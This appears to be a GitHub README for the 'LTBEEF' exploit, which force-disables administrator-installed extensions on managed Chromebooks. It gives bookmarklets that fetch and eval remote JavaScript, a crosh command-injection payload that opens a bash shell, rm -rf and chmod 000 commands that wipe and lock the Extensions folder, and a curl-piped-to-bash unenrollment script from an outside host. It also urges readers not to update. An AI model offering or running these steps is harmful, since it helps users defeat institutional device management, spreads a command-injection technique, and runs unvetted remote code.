Bookmarklet exploit that can force-disable any extension installed on Google Chrome. Also known as LTBEEF.
DO NOT UPDATE YOUR CHROMEBOOK! This exploit has been patched in versions 106 and above, so do not update! If you version is above 106, try this method
If you need any help, please go here: https://github.com/3kh0/ext-remover/discussions
Here are the instructions to using this exploit! There are two ways, using the GUI and using the ids, the GUI method is better.
Credit to Nebelung for this, link to the github
For easy setup go the the website at https://fognetwork.github.io/Ingot
- Show your bookmarks bar with
ctrl + shift + b
- Right click on the bar and choose
Add Page
- Set the name to
Ingot
and the URL to the code below or here
javascript:(function () {var a = document.createElement('script');a.src = 'https://cdn.jsdelivr.net/gh/FogNetwork/Ingot/ingot.min.js';document.body.appendChild(a);}())
If this helped please give me a star!
Credit to CompactCow#4717 for the amazing UI!
- Right click on the bar and choose
Add Page
- Set the name to
GUI
and the URL to the code below or here
javascript:fetch(`https://raw.githubusercontent.com/3kh0/ext-remover/main/exploit.js`).then(data=>{data.text().then(text=>{eval(text)})});
- Visit https://chrome.google.com/webstorex. (This is a 404 page, and that is ok.)
- Click the bookmark (Make sure you are on the page above!)
- Use the menu to toggle your extensions!
If this helped please give me a star!
- Visit chrome://extensions and on the extension you want to disable click on Details
- Copy the text in the URL after the
?id=
For example if you have this URL:
chrome://extensions/?id=echoontop
you would only copyechoontop
- Go to the file
bookmark.js
and copy everything and create a new bookmark and use the code you copied as the Page URL - Visit https://chrome.google.com/webstorex. (This is a 404 page, and that is ok.)
- Click the bookmark (Make sure you are on the page above!)
- Put the ID you copied into the text box.
You're done! The extension should now be disabled.
If this helped please give me a star!
- Visit chrome://extensions and on the extension you want to enable click on Details
- Click View in Chrome Web Store
- You will see a banner at the top of the page that says This item has been disabled in Chrome. Enable this item
- Click on Enable this item
You're done! The extension should now be enabled.
If this helped please give me a star!
Credit bypassi for finding and making this exploit!
Well, it's pretty basic. It finds extensions and displays them on this page with some toggle switches.
then, it detects when the toggle switch is toggled, and for what extension, then compiles a message to chrome that says "hey, turn this off for me". Chrome, mistaking this for the webstore complies.
This exploit details another way to permanently delete extensions. Once done, you can update or restart your chromebook and the extensions will stay gone until you powerwash.
You need a usb for downgrading, and rudimentary knowledge of bash is recommended
STEPS:
- Downgrade to any version below 101. Instructions are in Chrome100.dev.
- Hit
ctrl+alt+t
to open a crosh window. If it’s blocked by extensions, use LTBEEF. If it’s policy blocked (“The person who set up this computer has chosen to block this site”) you can try downgrading to a version below 90, where crosh had a different URL. - Type in
set_cellular_ppp \';bash;exit;\'
and hit enter. - You now have access to a bash shell, logged in as chronos. More information about the permissions of this shell is at the bottom.
- Type
rm -rf ~/Extensions/*
. THIS WILL BREAK EVERY EXTENSION ON YOUR CHROMEBOOK. If there are extensions you want to keep, they can be selectively removed by ID usingrm -rf ~/Extensions/InsertIdHere
- Run
chmod 000 ~/Extensions
. This marks the extension folder as read only, stopping it from updating in the future or any new extensions from being installed. - You can now restart chrome, allowing it to update to the latest version. Once rebooted onto the latest version, all removed extensions will have the default icon and won’t function at all.
Things you can’t do
- Run sudo or su into root. There might be ways to privilege escalate to root using disclosed chromium bug reports, but at the moment I have not gotten any of them to work on managed chromebooks
- Enable dev mode or use dev mode things
- Write to certain protected folders
- Install packages
- Install your own extensions. There is no way that known of (right now) to do that, so don’t ask. Please suggest any ideas.
- Modify an existing extension. Extensions are checksummed before running, so any modification will result in chrome thinking the extension is “corrupted” and trying to redownload it, failing if the directory is marked readonly
If anyone knows some fun commands for the bash shell to break things even further, let me know!
Thanks to CoolElectronics for finding this amazing trick, trent:gra.im and justinchrm for helping with some parts, and the discoverer of the original bash shell exploit found here https://bugs.chromium.org/p/chromium/issues/detail?id=1329945
Note: This only works on version 101!
Run the following commands in crosh:
set_cellular_ppp \';bash;exit;\'
bash <(curl https://coolelectronics.me/unenroll101.sh)